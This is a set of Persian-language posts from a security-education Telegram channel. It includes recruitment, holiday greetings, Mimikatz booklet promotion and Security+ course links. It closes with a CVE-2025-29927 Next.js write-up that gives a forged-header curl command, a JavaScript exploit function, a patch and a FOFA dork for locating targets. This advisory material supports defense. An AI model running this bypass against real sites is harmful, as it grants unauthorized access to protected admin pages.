📌 به خانواده TryHackBox بپیوندید!
💢 ما در TryHackBox به دنبال افراد پرانرژی، خلاق و متخصص هستیم تا در تیمهای مختلف ما عضو شوند. اگر به حوزه ردتیم و بلوتیم و تست نفوذ و موارد دیگر علاقهمندید و میخواهید در یک تیم پویا و حرفهای فعالیت کنید، این فرصت را از دست ندهید!
💢 ۱. عضویت در تیم مدرسین ما
آیا به آموزش و انتقال دانش علاقهمندید؟ به تیم مدرسین ما بپیوندید و در تولید دورههای آموزشی جذاب و کاربردی مشارکت کنید.
💢 ۲. عضویت در تیم ترجمه ما
اگر به زبان انگلیسی مسلط هستید و به ترجمه مقالات تخصصی علاقه دارید، تیم ترجمه ما منتظر شماست تا دانش امنیت را به زبان فارسی در دسترس همه قرار دهیم.
💢 ۳. عضویت در تیم ابزارنویسی ما
آیا به توسعه ابزارهای امنیتی و تست نفوذ علاقهمندید؟ به تیم ابزارنویسی ما بپیوندید و در ساخت ابزارهای نوآورانه مشارکت کنید.
💢 ۴. عضویت در تیم پادکستهای ما
عاشق روایت داستانها و تولید محتوای صوتی هستید؟ به تیم پادکستهای ما بپیوندید و داستانهای جذاب امنیت سایبری را روایت کنید.
📍نیاز فوری: به یک یا دو نفر تدوینگر حرفهای نیز نیازمندیم!
🧩 چرا به ما بپیوندید؟
- در یک تیم حرفهای و پویا فعالیت کنید.
- مهارتهای خود را ارتقا دهید.
- در تولید محتوای ارزشمند برای جامعه امنیت سایبری نقش داشته باشید.
👩💻 همین حالا به ما پیام دهید و به خانواده TryHackBox بپیوندید!
💠 شما میتوانید از طریق آیدی زیر به ما پیام دهید :
@Delaram_Najafii
💢 ما در TryHackBox به دنبال افراد پرانرژی، خلاق و متخصص هستیم تا در تیمهای مختلف ما عضو شوند. اگر به حوزه ردتیم و بلوتیم و تست نفوذ و موارد دیگر علاقهمندید و میخواهید در یک تیم پویا و حرفهای فعالیت کنید، این فرصت را از دست ندهید!
💢 ۱. عضویت در تیم مدرسین ما
آیا به آموزش و انتقال دانش علاقهمندید؟ به تیم مدرسین ما بپیوندید و در تولید دورههای آموزشی جذاب و کاربردی مشارکت کنید.
💢 ۲. عضویت در تیم ترجمه ما
اگر به زبان انگلیسی مسلط هستید و به ترجمه مقالات تخصصی علاقه دارید، تیم ترجمه ما منتظر شماست تا دانش امنیت را به زبان فارسی در دسترس همه قرار دهیم.
💢 ۳. عضویت در تیم ابزارنویسی ما
آیا به توسعه ابزارهای امنیتی و تست نفوذ علاقهمندید؟ به تیم ابزارنویسی ما بپیوندید و در ساخت ابزارهای نوآورانه مشارکت کنید.
💢 ۴. عضویت در تیم پادکستهای ما
عاشق روایت داستانها و تولید محتوای صوتی هستید؟ به تیم پادکستهای ما بپیوندید و داستانهای جذاب امنیت سایبری را روایت کنید.
📍نیاز فوری: به یک یا دو نفر تدوینگر حرفهای نیز نیازمندیم!
🧩 چرا به ما بپیوندید؟
- در یک تیم حرفهای و پویا فعالیت کنید.
- مهارتهای خود را ارتقا دهید.
- در تولید محتوای ارزشمند برای جامعه امنیت سایبری نقش داشته باشید.
👩💻 همین حالا به ما پیام دهید و به خانواده TryHackBox بپیوندید!
💠 شما میتوانید از طریق آیدی زیر به ما پیام دهید :
@Delaram_Najafii
❤3
Try Hack Box
📌 به خانواده TryHackBox بپیوندید! 💢 ما در TryHackBox به دنبال افراد پرانرژی، خلاق و متخصص هستیم تا در تیمهای مختلف ما عضو شوند. اگر به حوزه ردتیم و بلوتیم و تست نفوذ و موارد دیگر علاقهمندید و میخواهید در یک تیم پویا و حرفهای فعالیت کنید، این فرصت را…
دوستانی که در حوزه SOC و Forensic کار میکنند میتوانند پیام دهند برای تدریس یا فرستادن مقاله و موارد دیگر
جشن چارشنبه سوری خجسته باد
سیاوش چنین گفت با شهریار، که:
«دوزخ مرا زین سخن گشت خوار!
اگر کوهِ آتش بُوَد، بسپْرم.
از این، تنگِ خوار است اگر، بگذرم.
مگر آتشِ تیز، پیدا کند
گنه کرده را زود رسوا کند!
چو بخشایشِ پاکْ یزدان بُوَد
دَمِ آتش و آب یکسان بُوَد!»
سیاوش چنین گفت با شهریار، که:
«دوزخ مرا زین سخن گشت خوار!
اگر کوهِ آتش بُوَد، بسپْرم.
از این، تنگِ خوار است اگر، بگذرم.
مگر آتشِ تیز، پیدا کند
گنه کرده را زود رسوا کند!
چو بخشایشِ پاکْ یزدان بُوَد
دَمِ آتش و آب یکسان بُوَد!»
🔥13👎2
This media is not supported in your browser
VIEW IN TELEGRAM
🎊 پیشاپیش نوروز یادگار پرارج نیاکان ، شراره ی فروزان فرهنگ ایرانزمین، نشانی ز روزگاران یگانگی و سرفرازی ایرانیان بر شما پرسرور باد. 🎉
@TryHackBox
@TryHackBox
❤5👎5
درود دوستان این عیدی ما به شما
عیدی اول :
راهنمای جامع ابزار Mimikatz
این کتاب به بررسی ابزار Mimikatz میپردازد که برای استخراج پسوردها، هشها و توکنهای دسترسی از حافظه سیستم استفاده میشود. در این کتاب، شما با تکنیکهای پایه تا پیشرفته Mimikatz آشنا خواهید شد، از جمله استخراج اعتبارنامهها، دور زدن مکانیزمهای امنیتی و افزایش دسترسی. همچنین، نمونههایی از حملات واقعی که از Mimikatz استفاده کردهاند و نحوه مقابله با این ابزار بررسی شده است.
عیدی دوم ما :
آشنایی مقدماتی با Mimikatz
این کتاب به بررسی ابزار Mimikatz میپردازد که برای استخراج پسوردها و اعتبارنامهها از حافظه سیستم استفاده میشود. در این کتاب، شما با نحوه کار Mimikatz، قابلیتهای کلیدی آن، و نمونههایی از APT هکرها که از این ابزار استفاده کردهاند آشنا خواهید شد. همچنین، روشهای مقابله با Mimikatz و عبور از نرمافزارهای امنیتی نیز بررسی شده است.
برای دسترسی به کتابچه میمیکتز از لینک زیر استفاده کنید
@TryHackBox
عیدی اول :
راهنمای جامع ابزار Mimikatz
این کتاب به بررسی ابزار Mimikatz میپردازد که برای استخراج پسوردها، هشها و توکنهای دسترسی از حافظه سیستم استفاده میشود. در این کتاب، شما با تکنیکهای پایه تا پیشرفته Mimikatz آشنا خواهید شد، از جمله استخراج اعتبارنامهها، دور زدن مکانیزمهای امنیتی و افزایش دسترسی. همچنین، نمونههایی از حملات واقعی که از Mimikatz استفاده کردهاند و نحوه مقابله با این ابزار بررسی شده است.
عیدی دوم ما :
آشنایی مقدماتی با Mimikatz
این کتاب به بررسی ابزار Mimikatz میپردازد که برای استخراج پسوردها و اعتبارنامهها از حافظه سیستم استفاده میشود. در این کتاب، شما با نحوه کار Mimikatz، قابلیتهای کلیدی آن، و نمونههایی از APT هکرها که از این ابزار استفاده کردهاند آشنا خواهید شد. همچنین، روشهای مقابله با Mimikatz و عبور از نرمافزارهای امنیتی نیز بررسی شده است.
برای دسترسی به کتابچه میمیکتز از لینک زیر استفاده کنید
https://github.com/TryHackBox/Books
@TryHackBox
👍15
Try Hack Box
درود دوستان این عیدی ما به شما عیدی اول : راهنمای جامع ابزار Mimikatz این کتاب به بررسی ابزار Mimikatz میپردازد که برای استخراج پسوردها، هشها و توکنهای دسترسی از حافظه سیستم استفاده میشود. در این کتاب، شما با تکنیکهای پایه تا پیشرفته Mimikatz آشنا…
اگر این کتابچه برای شما مفید بود، لطفاً با دادن یک ستاره (Star) در گیتهاب، شما هم یک عیدی به ما بدید .
سال نو خجسته باد!
سال نو خجسته باد!
《 همه ساله بخت تو پیروز باد 》
《 همه روزگار تو نوروز باد 》
عید باشکوه و باستانی نوروز را به تمامی اعضای کانال که پا به پای ما حضور داشتند و چه در لحظات سخت و چه در لحظات خوشی مارا همراهی کردند شاد باش عرض میکنم امیدوارم که سال پر از خیر و برکتی را کنار خانواده و دوستان خود سپری کنید
پاینده باد ایران
@TryHackBox
《 همه روزگار تو نوروز باد 》
عید باشکوه و باستانی نوروز را به تمامی اعضای کانال که پا به پای ما حضور داشتند و چه در لحظات سخت و چه در لحظات خوشی مارا همراهی کردند شاد باش عرض میکنم امیدوارم که سال پر از خیر و برکتی را کنار خانواده و دوستان خود سپری کنید
پاینده باد ایران
@TryHackBox
❤7
This media is not supported in your browser
VIEW IN TELEGRAM
حضور پر شور مردم در لحظه تحویل سال ۱۴۰۴ در شهرستان پاسارگاد, آرامگاه کورش بزرگ
❤27👎8❤🔥1
بحث خارج از امنیت ممنوع
گپ پرسش و پاسخ
https://news.1rj.ru/str/+XPV3S0tygl1lZGE0
کانال ها :
@TryHackBoxStory
@TryHackBoxOfficial
گپ پرسش و پاسخ
https://news.1rj.ru/str/+XPV3S0tygl1lZGE0
کانال ها :
@TryHackBoxStory
@TryHackBoxOfficial
Telegram
TryHackBoxGp
بحث خارج از امنیت ممنوع
گپ پرسش و پاسخ
کانال ها :
@TryHackBox
@TryHackBoxOfficial
گپ پرسش و پاسخ
کانال ها :
@TryHackBox
@TryHackBoxOfficial
اطلاعات مربوط به نام میزبان.pdf
820.7 KB
این پست به بررسی اطلاعات نام میزبان ها (Hostnames) و نقش کلیدی آنها در حملات سایبری و تست نفوذ میپردازد.
📌 آنچه در این پست یاد میگیرید:
🔹 شناسایی اهداف حیاتی شبکه با تحلیل نام میزبانها (مثل VPN، Citrix، Exchange، SSO).
🔹 تکنیکهای نفوذ :
حمله Password Spraying به سرویسهای بدون MFA (مثال: VPN، Citrix).
🔹 استفاده از Log Stealer برای استخراج اعتبارنامه ها و Lateral Movement.
🔹 ابزارهای کلیدی: Nmap, Hydra, Metasploit, OpenVPN.
🔹 مثالهای عملی با دستورات فنی (اسکن پورتها، تست Breakout در Citrix، سرقت لاگها).
🔹 دفاع مؤثر: محدودسازی دسترسی، رمزنگاری لاگها، نظارت بر فعالیت ها.
#Recon
@TryHackBox
📌 آنچه در این پست یاد میگیرید:
🔹 شناسایی اهداف حیاتی شبکه با تحلیل نام میزبانها (مثل VPN، Citrix، Exchange، SSO).
🔹 تکنیکهای نفوذ :
حمله Password Spraying به سرویسهای بدون MFA (مثال: VPN، Citrix).
🔹 استفاده از Log Stealer برای استخراج اعتبارنامه ها و Lateral Movement.
🔹 ابزارهای کلیدی: Nmap, Hydra, Metasploit, OpenVPN.
🔹 مثالهای عملی با دستورات فنی (اسکن پورتها، تست Breakout در Citrix، سرقت لاگها).
🔹 دفاع مؤثر: محدودسازی دسترسی، رمزنگاری لاگها، نظارت بر فعالیت ها.
#Recon
@TryHackBox
👍4❤2🙏1
Try Hack Box
#جلسه_چهارم دوره #رایگان سکوریتی پلاس | Security + بخش : رمزنگاری دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیادهسازی…
#جلسه_پنجم دوره #رایگان سکوریتی پلاس | Security +
بخش : ادامه رمزنگاری
دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیادهسازی راهکارهای امنیتی،اصول رمزنگاری و درک اصول امنیت شبکه را آموزش میدهد.
قسمت اول :
https://youtu.be/Hn5qheOVz6Q
قسمت دوم :
https://youtu.be/R8Qzq0qQm3Q
قسمت سوم :
https://youtu.be/bE1KSm7U8uE
قسمت چهارم :
https://youtu.be/wOFhAGvFCSA
قسمت پنجم :
https://youtu.be/7xhLSLB79EI
----------
🆔 @TryHackBox
----------
بخش : ادامه رمزنگاری
دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیادهسازی راهکارهای امنیتی،اصول رمزنگاری و درک اصول امنیت شبکه را آموزش میدهد.
قسمت اول :
https://youtu.be/Hn5qheOVz6Q
قسمت دوم :
https://youtu.be/R8Qzq0qQm3Q
قسمت سوم :
https://youtu.be/bE1KSm7U8uE
قسمت چهارم :
https://youtu.be/wOFhAGvFCSA
قسمت پنجم :
https://youtu.be/7xhLSLB79EI
انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیتتری ارائه بدیم،امیدواریم از آموزش لذت ببرید.
----------
🆔 @TryHackBox
----------
👍8🙏2
Try Hack Box
#جلسه_پنجم دوره #رایگان سکوریتی پلاس | Security + بخش : ادامه رمزنگاری دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات،…
دوستانی که دوره سکوریتی پلاس مارو میگذرونند ، ما یک گروه ایجاد کردیم که فایل تمرینی یا اگر سوالی یا مشکلی داشتید بپرسید و فایل ها رو در اختیارتون قرار بدیم اگر مایل بودید به گروه بپیوندید به ما پیام دهید لینک گروه رو ارسال کنیم برای شما :
@Unique_exploitbot
@Unique_exploitbot
دوستان از این بعد لوگوی ما این خواهد بود و در مقالات و کتابها از این لوگو استفاده خواهیم کرد
🔥10👍1🌚1
#CVE-2025-29927
در فریمورک Next.js React یک آسیبپذیری امنیتی بحرانی شناسایی شده است که تحت شرایط خاص میتواند برای دور زدن بررسیهای احراز هویت مورد سوءاستفاده قرار گیرد.
این آسیبپذیری با شناسه CVE-2025-29927 ردیابی شده و امتیاز ۹.۱ از ۱۰ در مقیاس CVSS دارد.
Next.js از هدر داخلی
برای جلوگیری از ایجاد حلقههای بینهایت در درخواستهای بازگشتی استفاده میکند.
با این حال، رد شدن اجرای Middleware باعث میشود درخواستها بتوانند بررسیهای حیاتی، از جمله اعتبارسنجی کوکیهای احراز هویت، قبل از رسیدن به مسیرهای موردنظر را دور بزنند.
این مشکل در نسخههای ۱۲.۳.۵، ۱۳.۵.۹، ۱۴.۲.۲۵ و ۱۵.۲.۳ برطرف شده است. به عنوان راهکار موقت، توصیه میشود از پردازش درخواستهای کاربران خارجی که حاوی هدر
راشد علام (با نامهای مستعار zhero و cold-try )، محققی که این آسیبپذیری را کشف و گزارش کرد، جزئیات فنی بیشتری را افشا کرده است. بنابراین، توصیه میشود هرچه سریعتر پچ های امنیتی اعمال شوند.
به گفته JFrog، این باگ به مهاجمان اجازه میدهد به راحتی بررسیهای احراز هویت در Middleware ی Next.js را دور بزنند که ممکن است منجر به دسترسی به صفحات حساس وبسایت (مخصوص مدیران یا کاربران با دسترسی بالا) شود.
همچنین هشدار داده شده که هر وبسایتی که از Middleware برای کنترل دسترسی کاربران بدون بررسیهای اضافی استفاده میکند، در معرض این آسیبپذیری (CVE-2025-29927) قرار دارد و مهاجمان میتوانند به منابع غیرمجاز دسترسی پیدا کنند.
@TryHackBox
در فریمورک Next.js React یک آسیبپذیری امنیتی بحرانی شناسایی شده است که تحت شرایط خاص میتواند برای دور زدن بررسیهای احراز هویت مورد سوءاستفاده قرار گیرد.
این آسیبپذیری با شناسه CVE-2025-29927 ردیابی شده و امتیاز ۹.۱ از ۱۰ در مقیاس CVSS دارد.
Next.js از هدر داخلی
x-middleware-subrequestبرای جلوگیری از ایجاد حلقههای بینهایت در درخواستهای بازگشتی استفاده میکند.
با این حال، رد شدن اجرای Middleware باعث میشود درخواستها بتوانند بررسیهای حیاتی، از جمله اعتبارسنجی کوکیهای احراز هویت، قبل از رسیدن به مسیرهای موردنظر را دور بزنند.
این مشکل در نسخههای ۱۲.۳.۵، ۱۳.۵.۹، ۱۴.۲.۲۵ و ۱۵.۲.۳ برطرف شده است. به عنوان راهکار موقت، توصیه میشود از پردازش درخواستهای کاربران خارجی که حاوی هدر
x-middleware-subrequest هستند، جلوگیری شود. راشد علام (با نامهای مستعار zhero و cold-try )، محققی که این آسیبپذیری را کشف و گزارش کرد، جزئیات فنی بیشتری را افشا کرده است. بنابراین، توصیه میشود هرچه سریعتر پچ های امنیتی اعمال شوند.
به گفته JFrog، این باگ به مهاجمان اجازه میدهد به راحتی بررسیهای احراز هویت در Middleware ی Next.js را دور بزنند که ممکن است منجر به دسترسی به صفحات حساس وبسایت (مخصوص مدیران یا کاربران با دسترسی بالا) شود.
همچنین هشدار داده شده که هر وبسایتی که از Middleware برای کنترل دسترسی کاربران بدون بررسیهای اضافی استفاده میکند، در معرض این آسیبپذیری (CVE-2025-29927) قرار دارد و مهاجمان میتوانند به منابع غیرمجاز دسترسی پیدا کنند.
@TryHackBox
👍1
Try Hack Box
#CVE-2025-29927 در فریمورک Next.js React یک آسیبپذیری امنیتی بحرانی شناسایی شده است که تحت شرایط خاص میتواند برای دور زدن بررسیهای احراز هویت مورد سوءاستفاده قرار گیرد. این آسیبپذیری با شناسه CVE-2025-29927 ردیابی شده و امتیاز ۹.۱ از ۱۰ در مقیاس CVSS…
مکانیزم آسیبپذیری
این آسیبپذیری مربوط به رفتار نادرست سیستم Middleware در Next.js هنگام پردازش هدر x-middleware-subrequest است. این هدر به صورت داخلی توسط Next.js برای جلوگیری از حلقههای بازگشتی (recursive loops) در درخواستهای Middleware استفاده میشود.
کد آسیبپذیر (شبیهسازی):
نحوه سوءاستفاده
مهاجم میتواند با اضافه کردن هدر جعلی به درخواستهای خود، Middleware را دور بزند:
@TryHackBox
این آسیبپذیری مربوط به رفتار نادرست سیستم Middleware در Next.js هنگام پردازش هدر x-middleware-subrequest است. این هدر به صورت داخلی توسط Next.js برای جلوگیری از حلقههای بازگشتی (recursive loops) در درخواستهای Middleware استفاده میشود.
کد آسیبپذیر (شبیهسازی):
// middleware.js (نسخههای آسیبپذیر)
export function middleware(request) {
const isSubRequest = request.headers.get('x-middleware-subrequest');
if (isSubRequest) {
return NextResponse.next();
}
// بررسیهای احراز هویت
if (!isAuthenticated(request)) {
return new Response('Unauthorized', { status: 401 });
}
return NextResponse.next();
}
نحوه سوءاستفاده
مهاجم میتواند با اضافه کردن هدر جعلی به درخواستهای خود، Middleware را دور بزند:
curl -H "x-middleware-subrequest: 1" https://victim.com/admin
@TryHackBox
👏3❤1
Try Hack Box
مکانیزم آسیبپذیری این آسیبپذیری مربوط به رفتار نادرست سیستم Middleware در Next.js هنگام پردازش هدر x-middleware-subrequest است. این هدر به صورت داخلی توسط Next.js برای جلوگیری از حلقههای بازگشتی (recursive loops) در درخواستهای Middleware استفاده میشود.…
نمونه کد اکسپلویت
راهکارهای اصلاح
ارتقاء نسخه: استفاده از نسخههای اصلاح شده Next.js
میانافزار اصلاح شده:
راهکارهای دفاعی:
پیادهسازی بررسیهای احراز هویت در سطح صفحه
استفاده از کوکیهای امنیتی با HttpOnly و SameSite Strict
لاگگیری از درخواستهای حاوی هدر مشکوک
این آسیبپذیری نمونهای از مشکل اعتماد نابجا (Overreliance on Client-Supplied Headers) است. سیستم Middleware Next.js به صورت پیشفرض به هدرهای ارسالی توسط کلاینت اعتماد کرده بود، بدون آنکه مکانیسمی برای تأیید صحت آنها وجود داشته باشد.
این مشکل در معماری سیستمهای مبتنی بر Middleware رایج است، چرا که توسعهدهندگان اغلب فرض میکنند که برخی هدرها فقط توسط سیستم داخلی قابل استفاده هستند
@TryHackBox
async function exploit(targetUrl, protectedRoute) {
const headers = new Headers();
headers.append('x-middleware-subrequest', '1');
const response = await fetch(`${targetUrl}${protectedRoute}`, {
headers: headers
});
return response.status === 200;
}راهکارهای اصلاح
ارتقاء نسخه: استفاده از نسخههای اصلاح شده Next.js
میانافزار اصلاح شده:
export function middleware(request) {
// بررسی منشأ درخواست
const isInternalRequest = request.headers.get('x-verified-internal') === 'true';
// فقط برای درخواستهای داخلی اجازه رد شدن بدهد
if (request.headers.get('x-middleware-subrequest') && !isInternalRequest) {
return new Response('Invalid request', { status: 400 });
}
// ادامه منطق احراز هویت
}راهکارهای دفاعی:
پیادهسازی بررسیهای احراز هویت در سطح صفحه
استفاده از کوکیهای امنیتی با HttpOnly و SameSite Strict
لاگگیری از درخواستهای حاوی هدر مشکوک
این آسیبپذیری نمونهای از مشکل اعتماد نابجا (Overreliance on Client-Supplied Headers) است. سیستم Middleware Next.js به صورت پیشفرض به هدرهای ارسالی توسط کلاینت اعتماد کرده بود، بدون آنکه مکانیسمی برای تأیید صحت آنها وجود داشته باشد.
این مشکل در معماری سیستمهای مبتنی بر Middleware رایج است، چرا که توسعهدهندگان اغلب فرض میکنند که برخی هدرها فقط توسط سیستم داخلی قابل استفاده هستند
@TryHackBox
👏5❤1👍1🔥1
Try Hack Box
نمونه کد اکسپلویت async function exploit(targetUrl, protectedRoute) { const headers = new Headers(); headers.append('x-middleware-subrequest', '1'); const response = await fetch(`${targetUrl}${protectedRoute}`, { headers: headers }); return…
دورک :
https://en.fofa.info/result?qbase64=YXBwPSJORVhULkpTIg%3D%3D
FOFA Query:app="NEXT.JS"
@TryHackBox
https://en.fofa.info/result?qbase64=YXBwPSJORVhULkpTIg%3D%3D
FOFA Query:app="NEXT.JS"
@TryHackBox
FOFA
FOFA Search Engine
FOFA is a Cyberspace search engine. By conducting Cyberspace mapping, it can help researchers or enterprises quickly match network assets, such as vulnerability impact range analysis, application distribution statistics, and application popularity ranking…